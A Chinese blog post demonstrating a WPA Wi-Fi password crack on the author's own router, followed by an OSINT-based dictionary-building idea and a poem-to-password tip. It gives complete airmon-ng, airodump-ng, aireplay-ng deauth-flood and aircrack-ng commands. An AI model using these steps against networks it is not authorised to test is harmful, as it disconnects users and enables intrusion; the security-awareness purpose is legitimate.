你的Wi-Fi密码真的安全吗?

演示暴力破解wifi弱密码的过程,探讨密码设置上的文化差异;设置密码的技巧。****”

0x00


路由器用的是:小米AX1800;无线网卡用的是:淘宝上买的3070L。

图片

0x01


整个破解操作都在macOS的Kali虚拟机执行。启用虚拟机实例的USB控制器,切记选择USB 3.0(xHCI)控制器。

图片

0x02


插入USB无线网卡,在终端中执行

iwconfig

以查看无线网卡状态。

图片

0x03


发现当前无线网卡的模式是 Managed,为了能使用无线网卡侦听无线网络流量,需执行:

sudo airmon-ng start wlan0 && iwconfig

以修改网卡工作模式,完成了该操作,网卡名会在原来的 wlan0后拼接 mon 字符串,以表明该网卡进入监听模式。

图片

0x04


执行

sudo airodump-ng wlan0mon

查看当前空间环境中的Wi-Fi情况,记录需要破解的Wi-Fi信道CH值以及BSSID值。这里自家的Wi-Fi对象名称为 wifi,CH为6,BSSID为 64:64:4A:A8:C5:18。

图片

0x05


终止前一个操作,分别打开两个命令行终端,在第一个终端中执行

sudo airodump-ng -w resultname -c 6 --bssid 64:64:4A:A8:C5:18 wlan0mon

以嗅探wifi上的网络包。

图片

0x06


在第二个终端上执行

sudo aireplay-ng --deauth 5 -a 64:64:4A:A8:C5:18 wlan0mon

设定 deauth 参数为5,表示使用5次洪水攻击(如果为0,则表示无限次洪水攻击,直到用户主动停止),该操作会迫使已经连上Wi-Fi的设备断开连接,当用户设备断开后,会因为主动重连,产生握手包,而该握手包,会被第一个终端里的 airodump-ng 捕获。

图片

0x07


当发现第一个终端里的 airmon-ng 捕获到了握手包(右上角会有显示是否捕获到握手包),即可停止两个终端中的进程。

图片

0x08


执行

sudo airmon-ng stop wlan0mon

以关闭侦听。并利用指令

aircrack-ng -w /usr/share/wordlists/rockyou.txt resultname-01.cap

进行破解,其中rockyou.txt为kali自带到字典包,resultname-01.cap 为之前捕获网络包生成到文件记录。

图片


0x09


如果字典包中包含密码,则会停止破解,并显示wifi密码。

图片

文化差异


汉语语境下,大家更喜欢使用拼音组合数字的方式来制作密码;英语世界的人,则更偏好单词组合数字(可以分析观察近几年被严重泄漏的中英文账户数据库)。为此,在做渗透测试的过程中,应该基于场景构建破解字典包。

我的想法是,应该在完成 OSINT 搜集之后,利用对象的名称拼音生日电话车牌常用特殊字符构建一个附加字典集,然后配合通用字典集一起做渗透测试。

强密码技巧


很多时候用户不喜欢用强密码,并不是因为不会设计,而是嫌输入麻烦,更担心遗忘。不过好在我们拥有世界上公认难学的汉语,完全可以利用汉语的博大精深来创造便于记忆的强密码。

分享一个技巧,供大家参考。想一句你最喜欢的诗,譬如:孤帆远影碧空尽,惟见长江天际流。

自己脑子里设定一个音调映射关系。举例:

一声:大写该字母

二声:2

三声:^

四声:!

将诗句的每个字转换成拼音首字母,并基于该字的音调来进行转换。最终"孤帆远影碧空尽惟见长江天际流"会转换得到密码:

GFyyb!Kj!w2j!c2JTj!l2

这种密码,撞库几乎没啥可能性。(要知道:"y;}a%@W$\5\b"这个密码,根据美国佐治亚理工学院公布的一项研究称,破解需要17134年)

图片

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值